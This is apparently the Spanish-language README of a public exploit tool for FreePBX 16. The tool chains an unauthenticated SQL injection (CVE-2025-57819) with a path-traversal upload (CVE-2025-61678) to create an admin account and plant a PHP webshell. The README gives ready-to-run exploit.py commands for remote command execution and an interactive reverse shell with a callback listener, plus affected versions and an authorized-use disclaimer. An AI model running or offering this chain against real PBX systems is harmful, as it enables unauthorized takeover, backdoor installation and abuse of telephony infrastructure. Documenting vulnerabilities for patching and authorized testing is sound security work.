
Cadena de explotación de inyección SQL no autenticada y carga arbitraria de archivos para FreePBX 16, que logra ejecución remota de código mediante la creación de un administrador y el despliegue de una webshell.
| CVE | Componente | Impacto |
|---|
| CVE-2025-57819 | Cargador del módulo Endpoint (parámetro brand) | Inyección SQL apilada no autenticada |
| CVE-2025-61678 | Cargador de firmware de Endpoint Manager (parámetro fwbrand) | Carga arbitraria de archivos autenticada (path traversal) |
INSERT un administrador con acceso completo directamente en la tabla ampusers.../../../var/www/html/<dir> en fwbrand para escribir una webshell PHP en la raíz web.FreePBX 16 (módulo Endpoint anterior a 16.0.92). También parcheado en 17.0.6.
Actualice a una versión corregida.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Flag | Descripción |
|---|---|
--rhost | Host objetivo (obligatorio) |
--rport | Puerto objetivo (por defecto 443) |
--http | Usar HTTP en lugar de HTTPS |
--lhost / --lport | Dirección de callback de shell inverso |
--command | Ejecutar un solo comando en lugar de un shell |
pip install requests pwntools
Solo para pruebas de seguridad autorizadas y fines educativos. Úselo exclusivamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito para realizar pruebas. El autor no asume ninguna responsabilidad por el mal uso.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · inyección SQL no autenticada · inyección de consultas apiladas · módulo Endpoint · Endpoint Manager · carga de archivos autenticada · path traversal · ejecución remota de código · RCE · PoC · exploit · seguridad VoIP
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb